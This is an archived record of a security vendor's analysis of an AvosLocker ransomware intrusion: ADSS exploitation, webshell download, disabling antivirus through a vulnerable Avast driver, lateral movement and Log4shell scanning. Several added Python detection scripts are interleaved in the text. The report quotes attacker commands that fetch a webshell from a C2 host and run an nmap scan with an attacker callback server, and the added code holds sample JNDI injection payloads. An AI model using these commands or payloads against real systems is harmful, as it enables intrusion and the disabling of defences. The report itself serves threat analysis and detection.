{
	"id": "7b13e252-b424-4aa0-9c66-d58c6960134c",
	"created_at": "2026-04-06T00:16:32.775824Z",
	"updated_at": "2026-04-10T03:22:10.37833Z",
	"deleted_at": null,
	"sha1_hash": "2f1d25816c274a7d32a92bc4c341df8ce5df6503",
	"title": "AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1997793,
	"plain_text": "AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell\r\nBy: Christopher Ordonez, Alvin Nieto May 02, 2022 Read time: 7 min (1825 words)\r\nPublished: 2022-05-02 · Archived: 2026-04-05 13:36:28 UTC\r\nRansomware\r\nWe found an AvosLocker ransomware variant using a legitimate antivirus component to disable detection and blocking\r\nsolutions.\r\nWe found samples of AvosLocker ransomware that make use of a legitimate driver file to disable antivirus\r\nsolutions and evade detection. While previous AvosLocker infections employed similar routines, this is the first sample we\r\nobserved from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file\r\n(aswArPot.sys). In addition, the intrusion included scanning multiple endpoints for the Log4j vulnerability\r\nLog4shell using an Nmap NSE script.\r\nInfection chain\r\nFigure 1. AvosLocker infection chain\r\nAccording to our analysis, the suspected entry point is the Zoho ManageEngine ADSelfService Plus (ADSS) exploit:\r\nFigure 2. The ADSS exploit abusing CVE-2021-40539\r\nDue to the lack of network traffic details, we could not identify the exact CVE ID of the security gap the attacker used.\r\nHowever, there are some indications that they abused the same vulnerability previously documented by Synacktiv during a\r\npentest, CVE-2021-40539. The activity we observed closely matched that write-up: the creation of JSP files (test.jsp) and the execution of\r\nkeytool.exe with “null” parameters to run a crafted Java class.\r\nMapping the infection\r\nThe ADSS Java component (C:\\ManageEngine\\ADSelfService Plus\\jre\\bin\\java.exe) executed mshta.exe to run a\r\nremotely hosted HTML application (HTA) file from the attackers’ command and control (C\u0026C) server. Using Trend\r\nMicro™ Vision One™, we mapped out the process tree that the infection spawned. 
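The parent/child relationship just described (the ADSS java.exe launching mshta.exe with a remote HTA) is the kind of pattern an endpoint detection rule can catch. The Python below is an added example, not code from the Trend Micro write-up: it walks constructed process-creation records, flags script hosts whose ancestry includes an application-server process, and generalizes past the single java.exe to mshta.exe pair to any depth of descendants. The server image list beyond the ADSS path (tomcat, w3wp.exe), the 198.51.100.7 address and all command lines are assumptions made up for the example.

```python
'''Added example (not from the Trend Micro write-up): flag script hosts whose
ancestry includes an application-server process, over constructed
process-creation records modelled on the ADSS java.exe -> mshta.exe chain.'''
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


# Substrings identifying server processes that should never spawn script hosts.
# The ADSS path is the one in the write-up; tomcat and w3wp.exe are assumptions.
SERVER_IMAGES = (
    'manageengine\\adselfservice plus\\jre\\bin\\java.exe',
    'tomcat',
    'w3wp.exe',
)
SCRIPT_HOSTS = ('mshta.exe', 'powershell.exe', 'cmd.exe', 'wscript.exe',
                'cscript.exe', 'rundll32.exe')
# Plain or defanged (hxxp) URLs on the child command line.
REMOTE_URL = re.compile(r'h(?:tt|xx)ps?://\S+', re.I)


def basename(path):
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def is_server(ev):
    return any(s in ev.image.lower() for s in SERVER_IMAGES)


def server_ancestor(ev, by_pid, max_depth=5):
    '''Walk up the parent chain and return the first server process, if any.
    Depth is capped so a cyclic or very deep tree cannot loop forever.'''
    cur = ev
    for _ in range(max_depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            return None
        if is_server(cur):
            return cur
    return None


def find_suspicious_children(events):
    '''Return (ancestor_image, child_image, url_or_None) for every script host
    that descends from a server process, in event order.'''
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if basename(ev.image) not in SCRIPT_HOSTS:
            continue
        anc = server_ancestor(ev, by_pid)
        if anc is None:
            continue
        m = REMOTE_URL.search(ev.cmdline)
        hits.append((basename(anc.image), basename(ev.image), m.group(0) if m else None))
    return hits


# Constructed records (not a real capture); 198.51.100.7 is a documentation address.
SAMPLE_EVENTS = [
    ProcEvent(400, 1, 'C:\\ManageEngine\\ADSelfService Plus\\jre\\bin\\java.exe',
              'java.exe -Dcatalina.base=C:\\ManageEngine\\ADSelfService Plus'),
    ProcEvent(512, 400, 'C:\\Windows\\System32\\mshta.exe',
              'mshta.exe http://198.51.100.7/index.hta'),
    ProcEvent(640, 512, 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
              'powershell.exe -nop -w hidden -enc SQBFAFgA'),
    ProcEvent(300, 1, 'C:\\Windows\\explorer.exe', 'explorer.exe'),
    ProcEvent(700, 300, 'C:\\Windows\\System32\\mshta.exe',
              'mshta.exe C:\\Users\\alice\\setup.hta'),   # benign: user-launched
]

if __name__ == '__main__':
    for anc, child, url in find_suspicious_children(SAMPLE_EVENTS):
        print(anc, '->', child, url or '(no remote URL)')
```

Walking the ancestry rather than only the direct parent matters here: the PowerShell stage is a grandchild of java.exe, and a rule keyed on the immediate parent (mshta.exe) alone would not tie it back to the web application.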
\r\nhttps://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\r\nPage 1 of 9\n\nFigure 3. Remotely executing an HTA file from the C\u0026C server. Screenshots taken from Trend Micro Vision\r\nOne.\r\nFigure 4. HTA file connecting to the C\u0026C\r\nA closer look at the HTA file revealed that mshta.exe downloads and executes the remotely hosted HTA file. The HTA\r\nexecuted an obfuscated PowerShell script containing shellcode capable of connecting back to the C\u0026C server to\r\nexecute arbitrary commands.\r\nFigure 5. Obfuscated PowerShell script contains a shellcode\r\nThe PowerShell process then downloads an ASPX webshell from the C\u0026C server using the command \u003c cmd.exe /c\r\npowershell -command Invoke-WebRequest -Uri hxxp://xx.xx.xx.xx/subshell.aspx -OutFile /ManageEngine/ADSelfService\r\nPlus/webapps/adssp/help/admin-guide \u003e. As Synacktiv’s research notes, with this command the ASPX webshell is downloaded\r\nfrom a remote IP address and saved into the web application’s help directory, where it remains accessible to the attacker. The\r\nattackers then gathered system information using built-in tools such as whoami and systeminfo, as well as PowerShell\r\ncommands.\r\nFigure 6. Gather system information\r\nThe command was executed with the /domain argument so that the query is answered by the current domain controller and returns\r\nuser account information, while query user lists the sessions on a Remote Desktop Session Host server: the user name, session ID, session state\r\n(active or disconnected), idle time, and the date and time the user logged on.\r\nFigure 7. Executed with the /domain argument to collect username information\r\nFigure 8. 
query user information for session data\r\nThe PowerShell script downloads and installs the remote desktop tool AnyDeskMSI and allows it through the firewall.\r\nFigure 9. The PowerShell downloading and installing AnyDeskMSI\r\nWe observed that a new user account was created, added to the current domain, and included in the administrators group.\r\nThis ensures the attacker retains administrative rights on the infected system. The attackers also listed the running\r\nprocesses via TaskList to check for antivirus processes on the infiltrated system.\r\nFigure 10. Creating a new account with admin rights\r\nFigure 11. Checking for antivirus processes running\r\nDuring this check, we observed an attempt to terminate security products via TaskKill. When we tested the sample with Trend\r\nMicro Vision One, the attempt failed: its sensors were still able to send activity data to the platform.\r\nFigure 12. Terminating security products running\r\nTools and functions\r\nAdditional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network\r\nand disable security products. The tools transferred using AnyDesk are:\r\nNetscan: To scan for other endpoints\r\nNmap (log4shell.nse): To scan for Log4shell-vulnerable endpoints\r\nHacking tools Mimikatz and Impacket: For credential theft and lateral movement\r\nPDQ Deploy: For mass deployment of a malicious script to multiple endpoints\r\naswArPot.sys: For disabling defense solutions. We noted that it can disable a number of antivirus products,\r\nas previously identified by Aon’s researchers.\r\nFigure 13. 
Copying tools and other malicious components to the compromised machine using AnyDesk\r\nWe found the Avast anti-rootkit driver aswArPot.sys installed as the service aswSP_ArPot2 using the command sc.exe create aswSP_ArPot2\r\nbinPath= C:\\windows\\aswArPot.sys type= kernel. This registers the driver in preparation for disabling the running antivirus\r\nproduct. We noted the unusual use of cmd.exe to run the command.\r\nFigure 14. Executing the anti-rootkit driver in the system\r\nMimikatz components were also copied to the affected machine via AnyDeskMSI. However, these components were\r\ndetected and deleted.\r\nFigure 15. Detecting and deleting Mimikatz\r\nWe observed the PowerShell script disabling the security products by leveraging aswArPot.sys (a legitimate Avast Anti-Rootkit Driver). A list of security product processes was supplied to the driver, which then terminated them.\r\nFigure 16. Listing and terminating the security products found running in the compromised system\r\nVerification: Manual replication of antivirus disabling routine\r\nWe manually replicated the routine and commands for disabling the defense solutions to look further into the routine. Figure\r\n17 shows the list of processes that the routine searches for on infection:\r\nEndpointBasecamp.exe\r\nTrend Micro Endpoint Basecamp\r\nResponseService.exe\r\nPccNTMon.exe\r\nSupportConnector.exe\r\nAOTAgent.exe\r\nCETASvc.exe\r\nCETASvc\r\niVPAgent.exe\r\ntmwscsvc.exe\r\nTMResponse\r\nAOTAgentSvc\r\nTMBMServer\r\niVPAgent\r\nTrend Micro Web Service Communicator\r\nTmccsf\r\nTmlisten\r\nNtrtscan\r\nTmWSCSvc\r\nFigure 17. Searching for processes\r\nWe found that aswArPot.sys, registered as the service aswSP_ArPot2, provides the device handle used in the following\r\nDeviceIoControl call.\r\nFigure 18. 
Driver file preparing to disable an antivirus product\r\nThe DeviceIoControl function is used to invoke routines inside the driver. In this case, the DeviceIoControl call sits inside a loop that\r\niterates through the list of processes above. We can also see that 0x9988C094 is passed to\r\nDeviceIoControl as the control code, together with the ID of the current process in the iteration.\r\nFigure 19. DeviceIoControl as an argument with the current process ID\r\nInside aswArPot.sys, 0x9988C094 is handled by a switch case that calls sub_14001DC80, and inside\r\nsub_14001DC80 we can see that the function has the capability to terminate a given process.\r\nFigure 20. 0x9988C094 in a switch case with sub_14001DC80 (above), with the latter terminating a\r\nprocess (below).\r\nOther executions and lateral movement\r\nAfter disabling the security products, the actors behind AvosLocker again tried to transfer other tools, namely Mimikatz and\r\nImpacket.\r\nFigure 21. Execution of Mimikatz (above) and Impacket via C:\\temp\\wmiexec.exe (below)\r\nWe also observed the execution of the password recovery tool XenArmor via C:\\temp\\pass\\start.exe.\r\nFigure 22. XenArmor password recovery tool execution\r\nWe observed the attackers using an Nmap script to check for Log4shell, the Apache Log4j remote code execution (RCE)\r\nvulnerability CVE-2021-44228, across the network. They used the command nmap --script log4shell.nse --script-args log4shell.waf-bypass=true --script-args log4shell.callback-server=xx.xx.xx.xx:1389 -p 80,443 xx.xx.xx.xx/xx, with\r\nthe callback server set to the attacker group’s C\u0026C server.\r\nFigure 23. 
Checking for log4shell\r\nWe also observed more system network configuration discovery techniques being run, likely in preparation for lateral movement as the attackers\r\nlooked for other available endpoints.\r\nFigure 24. Running more system network configuration discovery scans\r\nDeploying across the network\r\nWe saw the software deployment tool PDQ Deploy being used to push malicious batch scripts to multiple endpoints in the network.\r\nFigure 25. Deploying malicious batch scripts to other endpoints\r\nThe deployed batch script has the following commands:\r\nDisable Windows Update and Microsoft Defender\r\nFigure 26. Disable Microsoft defense services\r\nPrevent safe-boot execution of security products\r\nFigure 27. Prevent security products’ execution\r\nCreate a new administrator account\r\nFigure 28. Create new account\r\nAdd an AutoStart mechanism for the AvosLocker executable (update.exe)\r\nFigure 29. Add Autostart for ransomware executable\r\nDisable the legal notice caption\r\nFigure 30. Disable legal notice\r\nSet safe boot with networking, disable Windows Error Recovery, and reboot\r\nFigure 31. Setting and disabling network and specific Windows functions\r\nConclusion\r\nWhile AvosLocker has been documented for its abuse of AnyDesk as its preferred application for lateral movement, we note\r\nthat other remote access applications can just as well be abused in its place. We think the same can be said for the software\r\ndeployment tool, which the malicious actors can subsequently replace with other commercially\r\navailable ones. 
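The driver stage analysed above (the sc.exe create command that registers aswArPot.sys as a kernel service, and the 0x9988C094 control code handed to DeviceIoControl in Figures 18 to 20) can be turned into two practical checks. The Python below is an added example, not code from the write-up or from Avast: it decodes the control code into the fields the Windows CTL_CODE macro packs into it, and parses sc create command lines to flag kernel-type services whose binary lives outside the system drivers directory or whose file name matches the abused driver. The field layout is the documented CTL_CODE layout; the sample command lines other than the one quoted in the write-up are constructed for the example.

```python
'''Added example (not from the Trend Micro write-up or from Avast): decode the
0x9988C094 control code and flag kernel services registered from unusual paths.'''
import re

# CTL_CODE(DeviceType, Function, Method, Access) packs its arguments as
# (DeviceType << 16) | (Access << 14) | (Function << 2) | Method.
METHODS = {0: 'METHOD_BUFFERED', 1: 'METHOD_IN_DIRECT',
           2: 'METHOD_OUT_DIRECT', 3: 'METHOD_NEITHER'}
ACCESS = {0: 'FILE_ANY_ACCESS', 1: 'FILE_READ_ACCESS',
          2: 'FILE_WRITE_ACCESS', 3: 'FILE_READ_ACCESS|FILE_WRITE_ACCESS'}


def decode_ioctl(code):
    '''Split a DeviceIoControl control code into its CTL_CODE fields.'''
    device_type = (code >> 16) & 0xFFFF
    return {
        'device_type': device_type,
        # Device types 0x8000 and above are reserved for third-party drivers.
        'vendor_defined': device_type >= 0x8000,
        'access': ACCESS[(code >> 14) & 0x3],
        'function': (code >> 2) & 0xFFF,
        'method': METHODS[code & 0x3],
    }


DQ = chr(34)   # double-quote character, kept out of the source literal
SC_CREATE = re.compile(r'\bsc(?:\.exe)?\s+create\s+(\S+)\s+(.*)$', re.I)
# sc.exe options are written as  name= value  (space after the equals sign);
# a quoted value may contain spaces.
SC_OPTION = re.compile(r'(\w+)=\s*(' + DQ + '[^' + DQ + ']*' + DQ + r'|\S+)')


def parse_sc_create(cmdline):
    '''Return (service_name, {option: value}) or None if not an sc create command.'''
    m = SC_CREATE.search(cmdline)
    if not m:
        return None
    opts = {k.lower(): v.strip(DQ) for k, v in SC_OPTION.findall(m.group(2))}
    return m.group(1), opts


DRIVERS_DIR = '\\system32\\drivers\\'
KNOWN_ABUSED = {'aswarpot.sys'}   # the driver named in the write-up


def flag_kernel_service(cmdline):
    '''Return a finding for an sc create that registers a kernel driver, or None.
    reasons is empty for a driver installed from the conventional location.'''
    parsed = parse_sc_create(cmdline)
    if parsed is None:
        return None
    name, opts = parsed
    if opts.get('type', '').lower() != 'kernel':
        return None
    binpath = opts.get('binpath', '')
    reasons = []
    if DRIVERS_DIR not in binpath.lower():
        reasons.append('binPath outside System32\\drivers')
    if binpath.replace('/', '\\').rsplit('\\', 1)[-1].lower() in KNOWN_ABUSED:
        reasons.append('file name matches a known abused driver')
    return {'service': name, 'binpath': binpath, 'reasons': reasons}


# Constructed command lines; the first is the one quoted in the write-up.
SAMPLE_CMDLINES = [
    'cmd.exe /c sc.exe create aswSP_ArPot2 binPath= C:\\windows\\aswArPot.sys type= kernel',
    'sc.exe create ExampleFlt binPath= C:\\Windows\\System32\\drivers\\examplefl.sys type= kernel start= demand',
    'sc create ExampleSvc binPath= C:\\Example\\svc.exe start= auto',
]

if __name__ == '__main__':
    print(decode_ioctl(0x9988C094))
    for line in SAMPLE_CMDLINES:
        print(flag_kernel_service(line))
```

Decoding 0x9988C094 gives device type 0x9988 (vendor-defined), function 0x25, METHOD_BUFFERED and read/write access; a name match alone is a weak signal once attackers rename the file, so a hash or signer check against the Microsoft vulnerable driver blocklist belongs alongside the path check in production.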
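The Log4shell scan in Figure 23 works by sending JNDI lookups to each target; with waf-bypass enabled the scanner is expected to wrap them in nested Log4j lookups so that a plain search for the string jndi: misses them (the write-up does not list the exact payloads the NSE script emits; the nested forms used below are common evasion variants and an assumption of this example). The Python below is an added example, not code from the write-up: it resolves the nesting the way Log4j 2.x would before checking for a JNDI reference, so the callback host and port the attacker configured can be recovered from a scanned server’s web logs. The log lines are constructed and use documentation addresses.

```python
'''Added example (not from the Trend Micro write-up): detect Log4Shell (CVE-2021-44228)
probes in web logs after undoing the nested-lookup obfuscation used to evade WAFs.'''
import re

# Innermost ${...} lookup: no further ${ or } inside the braces.
INNER = re.compile(r'\$\{([^${}]*)\}')
LOWER_UPPER = re.compile(r'^(lower|upper):(.*)$', re.S)
# ${key:-default}: Log4j substitutes the default when the lookup fails, and
# ${::-x} is the degenerate form with an empty key that always yields x.
DEFAULT = re.compile(r'^(.*?):-(.*)$', re.S)
JNDI = re.compile(r'jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^/\s}]+)', re.I)


def normalize(text, max_rounds=64):
    '''Resolve innermost lookups repeatedly, as Log4j 2.x would, until none
    remain. Lookups we cannot evaluate (jndi:, env:, date:, ...) keep their body
    with the braces stripped so the surrounding text stays inspectable.
    Defaults are taken unconditionally, which is right for detection even
    though a live lookup of an existing key would return the key's value.
    The round cap keeps hostile input from running forever.'''
    for _ in range(max_rounds):
        m = INNER.search(text)
        if not m:
            break
        body = m.group(1)
        lu = LOWER_UPPER.match(body)
        dv = DEFAULT.match(body)
        if lu:
            rep = lu.group(2).lower() if lu.group(1) == 'lower' else lu.group(2).upper()
        elif dv:
            rep = dv.group(2)
        else:
            rep = body
        text = text[:m.start()] + rep + text[m.end():]
    return text


def find_probes(lines):
    '''Return one finding per log line carrying a JNDI reference after normalization.'''
    hits = []
    for line in lines:
        m = JNDI.search(normalize(line))
        if m:
            hits.append({'source': line.split(' ', 1)[0],
                         'scheme': m.group(1).lower(),
                         'callback': m.group(2),
                         'raw': line})
    return hits


# Constructed log lines (not real traffic): source IP, method, path, then the
# header that carried the payload. 198.51.100.7 plays both scanner and callback.
SAMPLE_LOG = [
    '198.51.100.7 GET / User-Agent: ${jndi:ldap://198.51.100.7:1389/a}',
    '198.51.100.7 GET / User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/o}',
    '198.51.100.7 GET /login X-Api-Version: ${${lower:J}ndi:${lower:LDAP}://198.51.100.7:1389/o}',
    '203.0.113.9 GET / User-Agent: Mozilla/5.0 (compatible; benign)',
    '203.0.113.9 GET /docs Referer: ${env:HOME:-nothing here}',
]

if __name__ == '__main__':
    for h in find_probes(SAMPLE_LOG):
        print(h['source'], h['scheme'], h['callback'])
```

The callback field is the value worth pivoting on: in this intrusion it pointed at the attackers’ C2 on port 1389, so any outbound LDAP connection from an internal host to that address after the scan is a strong indicator of a successfully exploited Log4j instance rather than a mere probe.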
In addition, aside from its availability, the specific anti-rootkit driver was likely chosen for its\r\ncapability to execute in kernel mode (therefore operating at a high privilege).\r\nThis variant also modifies other settings of the compromised system, such as disabling the logon legal notice.\r\nOther modern ransomware, such as Mespinoza/Pysa, modify the registries of infected\r\nsystems during their respective routines to inform their victims that they have been compromised.\r\nSimilar to previously documented malware and ransomware groups, AvosLocker takes advantage of\r\nvulnerabilities that have yet to be patched to get into organizations’ networks. Once inside, the continuing trend of abusing\r\nlegitimate tools and functions to mask malicious activities and the actors’ presence grows in sophistication. In this case, the\r\nattackers were able to study and use Avast’s driver as part of their arsenal to disable other vendors’ security products.\r\nHowever, and specific to this instance, the attempt to kill an antivirus product, such as this variant’s use of TaskKill, can also be\r\nfoiled. In this example using Trend Micro Vision One, the attempt was unsuccessful, likely due to the product’s self-protection feature, which allowed the sensors to continue sending data and block the noted routine. The visibility enabled by\r\nthe platform allowed us as researchers to capture the extent of this ransomware’s attack chain and replicate the driver file\r\nbeing abused to verify its function during compromise.\r\nAvast responded to our notification with this statement:\r\n\"We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in\r\nJune 2021. 
We also worked closely with Microsoft, so they released a block in the Windows operating system (10 and 11), so\r\nthe old version of the Avast driver can't be loaded to memory.\r\nThe below example shows that the blocking works (output from the \"sc start\" command):\r\n               (SC) StartService FAILED 1275:\r\n               This driver has been blocked from loading\r\nThe update from Microsoft for the Windows operating system was published in February as an optional update, and in\r\nMicrosoft's security release in April, so fully updated machines running Windows 10 and 11 are not vulnerable to this kind of\r\nattack.\r\nAll consumer and business antivirus versions of Avast and AVG detect and block this AvosLocker ransomware variant, so\r\nour users are protected from this attack vector.\r\nFor users of third-party antivirus software, to stay protected against this vulnerability, we recommend users to update their\r\nWindows operating system with the latest security updates, and to use a fully updated antivirus program.\"\r\nIndicators of Compromise (IOCs)\r\nFile | SHA256 | Detection\r\nMalicious batch file component | a5ad3355f55e1a15baefea83ce81d038531af516f47716018b1dedf04f081f15 | Trojan.BAT.KILLAV.YACAA\r\nAvosLocker executable | 05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5 | Ransom.Win32.AVOSLOCKER.SMYX\r\nMimikatz executable (x32 and x64) | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | HackTool.Win64.MIMIKATZ.ZTJA\r\nMimikatz executable (x32 and x64) | e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98 | HackTool.Win32.Mimikatz.CNFW\r\nLog4shell Nmap NSE script | ddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96 | Backdoor.Win32.CVE202144228.YAC\r\nImpacket tool | 14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8 | HackTool.Win32.Impacket.AA\r\nSource: 
https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html"
	],
	"report_names": [
		"avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434592,
	"ts_updated_at": 1775791330,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2f1d25816c274a7d32a92bc4c341df8ce5df6503.pdf",
		"text": "https://archive.orkl.eu/2f1d25816c274a7d32a92bc4c341df8ce5df6503.txt",
		"img": "https://archive.orkl.eu/2f1d25816c274a7d32a92bc4c341df8ce5df6503.jpg"
	}
}